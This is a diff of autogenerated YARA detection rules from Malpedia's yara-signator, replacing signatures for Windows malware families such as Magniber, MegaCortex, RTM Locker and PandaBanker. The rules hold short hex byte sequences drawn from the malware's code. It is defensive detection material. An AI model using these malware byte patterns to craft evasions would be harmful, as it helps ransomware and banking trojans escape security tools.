 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "7fac4144-b4d1-566a-b639-19fbbfbfa437"
+		id = "cc094c21-b137-5d7e-ad7a-b11c96748bb2"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.magniber"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.magniber_auto.yar#L1-L168"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mbrlock"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.mbrlock_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "f96a42bc667d201d8cee5f819105f9eb43cfe17ca799b1fa9b8dd76d6755feb0"
+		logic_hash = "491b9f4fb168bceb19b5cf7b6c98ee71ee5564cadbcb31d189925e8a478d4bf3"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -136422,38 +136938,32 @@ rule MALPEDIA_Win_Magniber_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c7420c00400000 eb0a 8b45fc c7400c00800000 8b4dfc c70100000000 }
-		$sequence_1 = { ff15???????? eb2e 837df803 7528 8d4da0 51 }
-		$sequence_2 = { 52 8b4508 05e0020000 50 8b4d08 }
-		$sequence_3 = { 66894dc2 ba31000000 668955c4 b835000000 668945c6 b920000000 }
-		$sequence_4 = { c785f8fdffff409b4000 c785fcfdffff489b4000 c78500feffff509b4000 c78504feffff589b4000 c78508feffff609b4000 c7850cfeffff689b4000 }
-		$sequence_5 = { c785d8fbffff90964000 c785dcfbffff98964000 c785e0fbffffa0964000 c785e4fbffffac964000 c785e8fbffffb8964000 c785ecfbffffc0964000 }
-		$sequence_6 = { 56 c745f000001000 c745c800000000 c745cc00000000 c745dc00000000 }
-		$sequence_7 = { c78590fbfffff0954000 c78594fbfffff8954000 c78598fbffff00964000 c7859cfbffff0c964000 c785a0fbffff14964000 c785a4fbffff1c964000 }
-		$sequence_8 = { f8 a6 6e d89bcb299b94 }
-		$sequence_9 = { d331 4e4e54 70ac 52 }
-		$sequence_10 = { 184026 e221 a1????????05eef081 e0f8 29aed0515fa6 }
-		$sequence_11 = { 18cb 52 fc 285f44 c1c70d 11fb }
-		$sequence_12 = { 5a b3b1 3e6c 21746c2e 4834b0 184026 e221 }
-		$sequence_13 = { f76e9f 32d8 2d7a350e78 95 }
-		$sequence_14 = { 29aed0515fa6 8d4f0e 7f4c c82cd1c6 1a32 b636 }
-		$sequence_15 = { e8???????? 32cb 5a b3b1 }
+		$sequence_0 = { 7e26 8b4510 57 83c004 53 50 ff15???????? }
+		$sequence_1 = { 50 ff15???????? 8b0d???????? 8945fc eb25 81ff34080000 7c39 }
+		$sequence_2 = { 84c3 7521 8ad0 b980850110 0ad3 8815???????? }
+		$sequence_3 = { 0bc1 894de8 7519 68fc5a0110 6a02 684b030000 68d4580110 }
+		$sequence_4 = { 8965f0 8975ec 893e ff15???????? 50 8945e4 68a0620110 }
+		$sequence_5 = { e8???????? 8b442434 c744242000000000 83f803 0f87cb000000 ff248540504000 56 }
+		$sequence_6 = { 68d4580110 e8???????? 83c410 8b55c8 6a00 6a00 52 }
+		$sequence_7 = { 8b4508 c1f805 8d1c8500f74e00 8b4508 83e01f 8d34c0 }
+		$sequence_8 = { 68af010000 6898610110 e8???????? 83c410 8b45ec 85c0 7416 }
+		$sequence_9 = { c1e602 8932 5e b801000000 5b c21800 33c9 }
 
 	condition:
-		7 of them and filesize < 117760
+		7 of them and filesize < 2031616
 }
-rule MALPEDIA_Win_Qhost_Auto : FILE
+rule MALPEDIA_Win_Onhat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "b665b26d-0cb0-522b-ad4c-ae26d70948e9"
+		id = "4885dade-4fce-5e20-9ffa-fd32e752e39c"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.qhost"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.qhost_auto.yar#L1-L123"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.onhat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.onhat_auto.yar#L1-L119"
 		license_url = "N/A"
-		logic_hash = "9e1768d558cd3150b7b786a97888fc646ca0ae377a338c2bb336a3ca12cb703a"
+		logic_hash = "3d8264647f2b4bfebfbb64b6330e4d7098e25f3b002acba0b19c8992974ae5d6"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -136467,32 +136977,32 @@ rule MALPEDIA_Win_Qhost_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 7529 83bd6cffffff01 7520 8b55f8 81e2ffff0000 }
-		$sequence_1 = { 7528 83bd6cffffff01 751f 8b45f8 25ffff0000 83f801 7512 }
-		$sequence_2 = { e8???????? 50 8b8de0fdffff 51 e8???????? 83c408 8985ecfdffff }
-		$sequence_3 = { 8b4d08 51 e8???????? 83c418 8945fc eb30 837d1807 }
-		$sequence_4 = { 8b55f4 c682????????0a ebd5 8b45fc 50 ff15???????? }
-		$sequence_5 = { 837df800 741e 8b45fc 50 68???????? 68???????? ff15???????? }
-		$sequence_6 = { 33c0 837d1801 0f94c0 8885c4f9ffff }
-		$sequence_7 = { 0f84ab000000 8d559c 52 6a00 ff15???????? }
-		$sequence_8 = { 398da0f4ffff 0f8f84000000 8b95a0f4ffff 89959cf4ffff 8b85a0f4ffff 0500040000 }
-		$sequence_9 = { 7407 c745fcffffffff 8b45fc 8be5 5d }
+		$sequence_0 = { e8???????? 85c0 0f842b010000 6888130000 8d8c2424010000 6a10 51 }
+		$sequence_1 = { 50 c68424d90000004e c68424da00000054 c68424db00000041 c68424dc00000048 889c24dd000000 c68424de00000045 }
+		$sequence_2 = { 66894c2412 e8???????? 83f8ff 0f85a7000000 b04e b243 }
+		$sequence_3 = { 33c9 8a4c2426 52 c1e818 }
+		$sequence_4 = { c68424ca0000004f c68424cc00000070 c68424ce00000050 c68424d000000073 c68424d200000074 c68424d400000000 }
+		$sequence_5 = { 51 8b4c2458 50 52 51 }
+		$sequence_6 = { ffd6 8b2d???????? 8d842494000000 50 }
+		$sequence_7 = { 890d???????? 5b c3 8b048e 8a10 }
+		$sequence_8 = { 6a00 57 c744241c01000000 e8???????? 85c0 }
+		$sequence_9 = { 8b542440 52 8b542428 50 8b442464 50 }
 
 	condition:
-		7 of them and filesize < 286720
+		7 of them and filesize < 57344
 }
-rule MALPEDIA_Win_Megacortex_Auto : FILE
+rule MALPEDIA_Win_Unidentified_087_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ada38623-7613-5dfe-bdcd-0251e4cadd44"
+		id = "bb2770ef-ba3c-5373-be21-3fb31c73a40c"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.megacortex"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.megacortex_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_087"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.unidentified_087_auto.yar#L1-L173"
 		license_url = "N/A"
-		logic_hash = "708d38e954539c490225999d6efcff9513f99a24765329194cd39e598c2360c1"
+		logic_hash = "10f141206749e7e53bb829c93df64c19732ef1dad0c95b847ac5042b772c3c95"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -136506,32 +137016,38 @@ rule MALPEDIA_Win_Megacortex_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 50 e8???????? 8bf0 83c40c 85f6 756e ff751c }
-		$sequence_1 = { 03c8 890a 8b55e8 5f 0f114204 66897214 5e }
-		$sequence_2 = { 8b75c8 8975dc 8d4aff f7d9 1bc9 23c1 03c2 }
-		$sequence_3 = { 8985a8fbffff 85c0 0f845e020000 50 e8???????? 0fb6d8 0f57c0 }
-		$sequence_4 = { 8d46ff f7d8 1bc0 23c2 8bd7 03f0 8d7d0c }
-		$sequence_5 = { 23ca 03c1 8906 8b45d8 51 8bf4 8d4dd8 }
-		$sequence_6 = { 8b45f8 8d75e8 ff7508 51 8d50ff 8bfc 8d4df8 }
-		$sequence_7 = { ff5004 8bf7 85ff 0f8562ffffff 8b4df4 64890d00000000 }
-		$sequence_8 = { f7d8 895dfc 1bc0 23c1 8b10 2bc6 83e2fd }
-		$sequence_9 = { e8???????? 8d4598 c645fc05 50 8d45d8 83cb0a 50 }
+		$sequence_0 = { 488bc3 4a8d1429 488d0c38 4d8bc4 4903d4 4c2bc5 4803cd }
+		$sequence_1 = { 488bce ff15???????? 90 e9???????? 66448928 44896c2460 ff15???????? }
+		$sequence_2 = { 7415 41b900800000 4533c0 488bd6 488bcf ff15???????? }
+		$sequence_3 = { bb01000000 4885f6 7415 41b900800000 }
+		$sequence_4 = { 488bc8 4c8d442460 418d542428 ff15???????? }
+		$sequence_5 = { 0fb77526 440fb74d24 89442460 894c2458 89542450 }
+		$sequence_6 = { 4d8bc4 ba08030000 ff15???????? e9???????? 4c8d4c2430 4533c0 }
+		$sequence_7 = { 4a8d0c28 4d8bc6 4803cd 4803d6 e8???????? 48837b1810 7205 }
+		$sequence_8 = { a1???????? 83f803 7409 83f801 0f8535fcffff 8b0d???????? }
+		$sequence_9 = { eb54 83460801 83560c00 8807 8b0e 8b5104 8b443238 }
+		$sequence_10 = { 7435 83e805 0f8510010000 a1???????? 8b4d10 }
+		$sequence_11 = { 83f804 0f8542010000 83ec1c 8bcc }
+		$sequence_12 = { 8d4db4 e8???????? 32c0 e9???????? 8b8d54ffffff 6aff }
+		$sequence_13 = { 50 c685fcfbffff00 e8???????? 8b5508 83c40c }
+		$sequence_14 = { 56 ff15???????? 85c0 75e7 eb0e 8d4c242c 51 }
+		$sequence_15 = { 0fb685e6feffff 0fb68de5feffff 52 0fb695e4feffff 50 }
 
 	condition:
-		7 of them and filesize < 1556480
+		7 of them and filesize < 462848
 }
-rule MALPEDIA_Win_Rtm_Locker_Auto : FILE
+rule MALPEDIA_Win_Casper_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "0ddce877-c810-52c5-9bdb-6bdd5bdc33c5"
+		id = "e6e721c8-dd07-5896-b009-f293b597cc79"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rtm_locker"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.rtm_locker_auto.yar#L1-L125"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.casper"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.casper_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "368fcfca2d19a0bfd2fafa00b39d1c6b06c40ca85cdf8b686f8ad87f29bc5ebf"
+		logic_hash = "44b510f3119535b0c0c8064d1c39533cfa6df7cf823ef2fa1ba3402aaa98bcc5"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -136545,34 +137061,34 @@ rule MALPEDIA_Win_Rtm_Locker_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c1fe06 e8???????? 59 83e03f 59 6bc838 8b04b5500f4200 }
-		$sequence_1 = { ff15???????? 8b1d???????? 89442410 85f6 }
-		$sequence_2 = { 8945e4 03c6 8945d0 33c7 8b75ec c1c007 8945f8 }
-		$sequence_3 = { 33ff 3bf0 7711 8d8550ffffff 8945d8 8d463c 3b45d8 }
-		$sequence_4 = { 0f28cb 8344242810 660f62d0 660f6ae0 0f104630 89542420 }
-		$sequence_5 = { 660fefc8 0f104220 0f1149d1 0f104e20 660fefc8 0f104230 0f1149e1 }
-		$sequence_6 = { 23cb c1fe1f 8b5dd0 23ce 8b75e8 }
-		$sequence_7 = { 50 ffd6 833d????????00 8b3d???????? 7442 6a00 8d442414 }
-		$sequence_8 = { 68???????? 57 ff15???????? 8d85a0fdffff }
-		$sequence_9 = { 0f108570feffff 0f118508ffffff e8???????? 8d8d30feffff e8???????? 8d8d30feffff e8???????? }
+		$sequence_0 = { 8d4d10 51 57 8d4d08 51 56 ff7514 }
+		$sequence_1 = { 8945f4 885dfc 895df8 e8???????? 8a07 3c41 7c09 }
+		$sequence_2 = { 6a2c e8???????? 59 3bc3 7409 8bf0 e8???????? }
+		$sequence_3 = { ff7508 e8???????? 85c0 7431 391e 762d 8d7e04 }
+		$sequence_4 = { 13f9 e8???????? 3bd7 770f 7205 3b45e4 7308 }
+		$sequence_5 = { e8???????? 59 3bf8 72e5 6a3d 8bc3 e8???????? }
+		$sequence_6 = { 8a8040a14200 8845f4 ff75f4 8bc6 e8???????? 0fb64701 0fb64f02 }
+		$sequence_7 = { 50 6a00 ff75fc e8???????? 85c0 740a ff75fc }
+		$sequence_8 = { 8d143b 8945fc 8945f8 3bd1 7746 3bc8 7303 }
+		$sequence_9 = { 6a28 c6431001 e8???????? 8bf8 33c0 59 3bf8 }
 
 	condition:
-		7 of them and filesize < 598016
+		7 of them and filesize < 434176
 }
-rule MALPEDIA_Win_Misfox_Auto : FILE
+rule MALPEDIA_Win_Maktub_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "4f561487-7df3-5819-8af4-11354d9ab382"
+		id = "10d37b97-d01f-5921-a99f-ff7dd2fcd55b"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.misfox"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.misfox_auto.yar#L1-L178"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.maktub"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.maktub_auto.yar#L1-L207"
 		license_url = "N/A"
-		logic_hash = "edbf452d1e5320fd7ba0f107fb137baa64797e4d5896d9322787053f0ee80ff3"
+		logic_hash = "3c5d956147e4a1bdb902ea8258e01af6a03648debc316e3eed6aa86b46300c73"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -136584,38 +137100,83 @@ rule MALPEDIA_Win_Misfox_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 51 ba00020000 c744244800080000 8d4c2434 89442444 e8???????? 83c404 }
-		$sequence_1 = { 8d7f04 f77d08 8b45f8 46 0fb61402 03d1 0355fc }
-		$sequence_2 = { 884dab 83f80b 0f877b020000 ff2485b4d30010 8d41cf 3c08 }
-		$sequence_3 = { 6a02 6a00 6a00 6800000040 8d84243c010000 }
-		$sequence_4 = { 56 ff15???????? 8d4c2410 e8???????? 56 ff15???????? }
-		$sequence_5 = { 57 33c0 8d7b08 8bf7 8906 }
-		$sequence_6 = { 8b048550870110 f644010440 7409 803a1a 7504 }
-		$sequence_7 = { 6a25 40 50 8d45d0 50 ff15???????? 8d45c0 }
-		$sequence_8 = { e8???????? 488d053cf90000 488d15b56c0100 488d4c2420 4889442420 }
-		$sequence_9 = { 3b3d???????? 737d 488bc7 488bdf 48c1fb05 4c8d3512e30000 }
-		$sequence_10 = { 458d4e1b 4533c0 488bd6 48c7c101000080 }
-		$sequence_11 = { 8b7520 eb04 8b742460 488d85d0000000 4889442420 4533c9 }
-		$sequence_12 = { e8???????? bb22000000 e9???????? 48897c2410 4c89742420 55 488bec }
-		$sequence_13 = { b8fb81ace5 41f7e9 4103d1 c1fa0f 8bc2 c1e81f }
-		$sequence_14 = { 8b04b1 488d0cb1 418942fc 448901 4181f900010000 7cc3 4c891c24 }
-		$sequence_15 = { 1bc0 4123c4 ffc8 443875f8 740b 488b4df0 83a1c8000000fd }
+		$sequence_0 = { ffd0 f7d8 1bc0 f7d8 8be5 }
+		$sequence_1 = { ff7508 ffd0 85c0 0f846bffffff }
+		$sequence_2 = { ff15???????? c74604???????? c70601000000 eb02 33f6 8b0d???????? }
+		$sequence_3 = { c7430800000000 c7430c00000000 85f6 7428 a1???????? 8b3e 85c0 }
+		$sequence_4 = { ff15???????? c74604???????? c70602000000 eb02 }
+		$sequence_5 = { ff15???????? e9???????? 6a00 8d45f8 c745f800000000 }
+		$sequence_6 = { ff15???????? e9???????? 51 8bdc }
+		$sequence_7 = { c7430800000000 c7430c00000000 c7430400000000 c70300000000 }
+		$sequence_8 = { ff30 e8???????? 8bc7 5f 5e 5b }
+		$sequence_9 = { 8d4e48 e8???????? 6a05 8bce e8???????? 5f }
+		$sequence_10 = { c7461407000000 33c0 668906 5e c20800 b8???????? e8???????? }
+		$sequence_11 = { 8d4e48 e8???????? 8d4e34 e8???????? 8d4e08 }
+		$sequence_12 = { 8d4e50 e8???????? 8bc6 5e }
+		$sequence_13 = { 8d4e50 e8???????? 8d4e40 e8???????? 8d4e30 e8???????? 8d4e1c }
+		$sequence_14 = { c7463464204d00 c7463806000000 c6463c00 5f }
+		$sequence_15 = { c7463464204d00 57 ff7634 e8???????? }
+		$sequence_16 = { 8d4e68 e8???????? 83a6b400000000 8d8eb8000000 }
+		$sequence_17 = { c7461c00000000 85db 741a 68b4000000 }
+		$sequence_18 = { 8d4e48 e8???????? 814e0400000080 8bc6 }
+		$sequence_19 = { c7463464204d00 6a00 57 8bce }
+		$sequence_20 = { c746140f000000 c60600 5e c20800 8b542404 }
+		$sequence_21 = { 8d4e50 e8???????? 8d4df0 e8???????? }
+
+	condition:
+		7 of them and filesize < 3063808
+}
+rule MALPEDIA_Win_Bunitu_Auto : FILE
+{
+	meta:
+		description = "autogenerated rule brought to you by yara-signator"
+		author = "Felix Bilstein - yara-signator at cocacoding dot com"
+		id = "b836f62d-ccb0-5139-8fb4-d5cfc207aba0"
+		date = "2024-10-31"
+		modified = "2024-11-11"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bunitu"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.bunitu_auto.yar#L1-L124"
+		license_url = "N/A"
+		logic_hash = "1cf3d7359d010e00d7ff20ba5e701d6257e9f7229ca17c7a247d649a01d8b461"
+		score = 75
+		quality = 75
+		tags = "FILE"
+		version = "1"
+		tool = "yara-signator v0.6.0"
+		signator_config = "callsandjumps;datarefs;binvalue"
+		malpedia_rule_date = "20241030"
+		malpedia_hash = "26e26953c49c8efafbf72a38076855d578e0a2e4"
+		malpedia_version = "20241030"
+		malpedia_license = "CC BY-SA 4.0"
+		malpedia_sharing = "TLP:WHITE"
+
+	strings:
+		$sequence_0 = { 8d8c29d4feffff 0fb709 8bf9 59 8d8dd9feffff c6040800 3680bc28d8feffff2f }
+		$sequence_1 = { 6a00 50 ff15???????? 6a00 68e8030000 ff15???????? 33c0 }
+		$sequence_2 = { 8b4508 8b08 894df8 8b4804 894dfc c7400400000000 c70000000000 }
+		$sequence_3 = { 7412 48 50 ff7508 ffb528fdffff e8???????? }
+		$sequence_4 = { e8???????? 8945fc c78560feffff00000000 0f31 }
+		$sequence_5 = { 50 ff75ec e8???????? 0bc0 7e18 50 }
+		$sequence_6 = { c70003000000 ffb524fdffff 8f4004 ffb528fdffff }
+		$sequence_7 = { ffb524fdffff e8???????? eb12 6a08 68???????? ffb524fdffff e8???????? }
+		$sequence_8 = { 81c458feffff 8dbd58feffff b91c000000 33c0 f3aa e8???????? }
+		$sequence_9 = { 2bfa 87fa 5f 8bc2 48 40 }
 
 	condition:
-		7 of them and filesize < 266240
+		7 of them and filesize < 221184
 }
-rule MALPEDIA_Win_Bookcodesrat_Auto : FILE
+rule MALPEDIA_Win_Graftor_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "99ba8457-466c-5891-8a8f-fdeb5f482f06"
+		id = "c144e9e9-346f-5b6a-9dfe-1d03b0e82296"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bookcodesrat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.bookcodesrat_auto.yar#L1-L129"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.graftor"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.graftor_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "97a726b41418f1d2b06b45e6dc5e4910d38bdcc7f5f296e48cad978114a25824"
+		logic_hash = "fb4376621aa16704d8aafacb83eec317def5e2f740ec5d73dd897b4e00fd49ae"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -136629,32 +137190,32 @@ rule MALPEDIA_Win_Bookcodesrat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff15???????? 4883bba036000000 48898318360000 0f847f040000 4883bba836000000 0f8471040000 4883bb1036000000 }
-		$sequence_1 = { 4c8b442460 ba01000000 498bcc ffd3 488bc3 4883c440 415d }
-		$sequence_2 = { e8???????? 488d7b58 be06000000 488d05f5300200 483947f0 7412 488b0f }
-		$sequence_3 = { 498bcd e8???????? 48ffc3 e9???????? 498bcd e8???????? 48ffc3 }
-		$sequence_4 = { 488bf0 ff9360370000 488d8d78040000 4c8be0 ff9360370000 488d8d48050000 4c8bf8 }
-		$sequence_5 = { 888548070000 48898549070000 48898551070000 888588060000 48898589060000 48898591060000 898599060000 }
-		$sequence_6 = { 488bcf 48898350370000 ff15???????? 488d9520040000 488bcf 48898358370000 }
-		$sequence_7 = { 8bc3 488b8c24d0020000 4833cc e8???????? 4881c4e0020000 }
-		$sequence_8 = { 4c897c2420 4c8d05e46dffff 0f1f4000 4885db 7504 }
-		$sequence_9 = { 48ffc6 4883c310 493bf4 b900000000 7c8e 4c8b6580 4c8b6c2478 }
+		$sequence_0 = { c684246003000090 e8???????? 8d8c24e8010000 51 8d4c2440 51 8d9424c4000000 }
+		$sequence_1 = { 81fee8d94e00 59 7cee 5e c3 8bff 55 }
+		$sequence_2 = { 6a30 ff750c 6a00 ff7508 ffd0 5d }
+		$sequence_3 = { a5 a5 a5 7205 8b4004 eb03 83c004 }
+		$sequence_4 = { ff15???????? 57 85c0 750c ff15???????? 32c0 5f }
+		$sequence_5 = { 732c ff75f0 8b4508 8b00 ff75ec 8945e4 8d45e4 }
+		$sequence_6 = { 57 50 51 57 68e9fd0000 ffd3 8945c8 }
+		$sequence_7 = { c20400 55 8bec 8b450c 8d4802 668b10 40 }
+		$sequence_8 = { 6a00 6a01 ff15???????? 85c0 7406 8935???????? c605????????01 }
+		$sequence_9 = { 57 e8???????? 8bc7 e8???????? 84c0 750b 68d8db4c00 }
 
 	condition:
-		7 of them and filesize < 544768
+		7 of them and filesize < 294912
 }
-rule MALPEDIA_Win_Radrat_Auto : FILE
+rule MALPEDIA_Win_Opachki_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "94a4381e-af30-56d4-9d5d-0552148c1f7c"
+		id = "291586d9-b070-57a5-aa2e-28c307c908af"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.radrat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.radrat_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.opachki"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.opachki_auto.yar#L1-L164"
 		license_url = "N/A"
-		logic_hash = "67ebe4ff9f98e9eca0e16834a563e516c10727efd1f7a1ab36f600d08a7aa26c"
+		logic_hash = "d90c4672bb521b58f2551b67ed4270be91d6ae941a1e85079915797925d00bdb"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -136668,32 +137229,37 @@ rule MALPEDIA_Win_Radrat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 83bdb4feffff00 7554 8b85b0feffff 50 ff15???????? 8b4d08 }
-		$sequence_1 = { 8d9550fdffff 52 ff15???????? 83c40c 8d8550fdffff 50 8d8d40fdffff }
-		$sequence_2 = { e8???????? 8985e07cffff 8d8d00e6ffff 51 e8???????? 83c42c 8985dc7cffff }
-		$sequence_3 = { 8d8d5cffffff e8???????? c745fc00000000 8b8568fbffff c7805003000000000000 c7805403000000000000 8b8d68fbffff }
-		$sequence_4 = { e8???????? 8b8d44feffff e8???????? 25ff000000 85c0 7414 8b8d44feffff }
-		$sequence_5 = { c1e608 8b559c 33ff 668bba4c020000 03fe 03f8 03f9 }
-		$sequence_6 = { 8d8d58ffffff e8???????? c745fcffffffff 8d4d80 e8???????? 8a85148effff e9???????? }
-		$sequence_7 = { 8d8d10fdffff e8???????? c3 8d8de8fcffff e8???????? c3 8d8dc0fcffff }
-		$sequence_8 = { c645fc01 8d8d58feffff e8???????? c645fc00 8d8d80feffff e8???????? c745fcffffffff }
-		$sequence_9 = { 8d8d18d7ffff e8???????? c645fc02 8d8df0d6ffff e8???????? c645fc01 8d8d58ffffff }
+		$sequence_0 = { 33f6 56 6806000200 56 56 }
+		$sequence_1 = { 2b45f8 ebf2 55 8bec 8b4508 57 }
+		$sequence_2 = { 8b450c 56 8b7108 3bc6 7205 83c8ff }
+		$sequence_3 = { 6a0d 68???????? 8d4ddc e8???????? 68ff000000 8d85d4feffff 50 }
+		$sequence_4 = { c3 55 8bec 81ec00010000 ff7508 }
+		$sequence_5 = { ff15???????? 83c40c 8b4f04 8d0433 }
+		$sequence_6 = { ff15???????? 8b35???????? 6a00 bf80000000 57 6a03 6a00 }
+		$sequence_7 = { 7413 8b4704 03c8 53 51 03c6 }
+		$sequence_8 = { 752b 46 88470c 88c4 c0ec06 88670d }
+		$sequence_9 = { 7427 f6c140 7412 08d2 7408 66ad }
+		$sequence_10 = { 3c65 7505 884703 ebcc }
+		$sequence_11 = { ac 7710 80fff6 7503 }
+		$sequence_12 = { 61 c3 898389838983 898389838983 898389838585 858585858585 }
+		$sequence_13 = { 99 b125 f3aa 83ef25 8b742424 ac }
+		$sequence_14 = { 3cf2 7505 884701 ebf2 3cf0 7505 884702 }
 
 	condition:
-		7 of them and filesize < 2080768
+		7 of them and filesize < 122880
 }
-rule MALPEDIA_Win_Boaxxe_Auto : FILE
+rule MALPEDIA_Win_Pandabanker_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "1250eef8-010c-5e96-be9a-abfd5ef5d010"
+		id = "751a691a-c53d-5542-8dd0-6d6e61efc66b"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.boaxxe"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.boaxxe_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pandabanker"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.pandabanker_auto.yar#L1-L116"
 		license_url = "N/A"
-		logic_hash = "8a3a4e3c549e35ded84e2465f19cea84a5ad121ff4106ae44ae1865048bfef1a"
+		logic_hash = "af183af405489953bbbd5be29d963fc77205c0eef74bef65d65833acc7e1921c"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -136707,34 +137273,34 @@ rule MALPEDIA_Win_Boaxxe_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d45ec e8???????? 66837dee08 0f8290000000 33d2 55 68???????? }
-		$sequence_1 = { 7d02 8bc3 8bc8 03c9 8b1424 8b06 e8???????? }
-		$sequence_2 = { 833c2400 750e b001 e8???????? eb05 33c0 890424 }
-		$sequence_3 = { e8???????? ff75e8 8bc7 ba03000000 e8???????? 43 83fb0a }
-		$sequence_4 = { 8b45f4 8b55e8 e8???????? c645f301 eb0f 43 4f }
-		$sequence_5 = { 8d4ddc ba12000000 e8???????? 8d45dc 50 e8???????? e8???????? }
-		$sequence_6 = { ba???????? 8b45fc e8???????? 8b45f4 8bd3 e8???????? 8b03 }
-		$sequence_7 = { 8b4028 e8???????? 33c0 89431c c7432001000000 c7435404000000 eb3c }
-		$sequence_8 = { ff75e4 ff75e8 683850bc6d e8???????? 83c410 8b45f8 83ec08 }
-		$sequence_9 = { c745fc20000000 8d45a0 8b55f0 e8???????? 8b45a0 33c9 8b55f4 }
